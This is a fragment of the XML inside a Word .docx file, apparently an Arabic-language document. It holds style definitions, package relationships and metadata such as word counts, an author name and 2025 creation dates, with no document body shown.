    <w:rsid w:val="001D0A4C"/>
    <w:rsid w:val="00435227"/>
    <w:rsid w:val="006F1D73"/>
    <w:rsid w:val="0096511C"/>
    <w:rsid w:val="00BD3CF0"/>
    <w:rsid w:val="00E97884"/>
    <w:rsid w:val="00EF2EC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ecimalSymbol w:val="."/>
  <w:listSeparator w:val=";"/>
  <w14:docId w14:val="22271962"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1105F03D-D199-3E44-A815-447B45388B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uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4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Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4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Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4C"/>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Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4C"/>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Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4C"/>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Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4C"/>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1D0A4C"/>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1D0A4C"/>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1D0A4C"/>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1D0A4C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="عنوان 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>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0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="عنوان 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="5Char">
    <w:name w:val="عنوان 5 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6Char">
    <w:name w:val="عنوان 6 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="7Char">
    <w:name w:val="عنوان 7 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8Char">
    <w:name w:val="عنوان 8 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9Char">
    <w:name w:val="عنوان 9 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4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1D0A4C"/>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1D0A4C"/>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1D0A4C"/>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1D0A4C"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="اقتباس Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char2"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4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2">
    <w:name w:val="اقتباس مكثف Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="001D0A4C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="001D0A4C"/>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 /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xm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fontTable" Target="fontTable.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" /></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726</Words>
  <Characters>4139</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>34</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4856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Mohamed Fleifel</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mohamed Fleifel</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-27T20:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-27T20:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>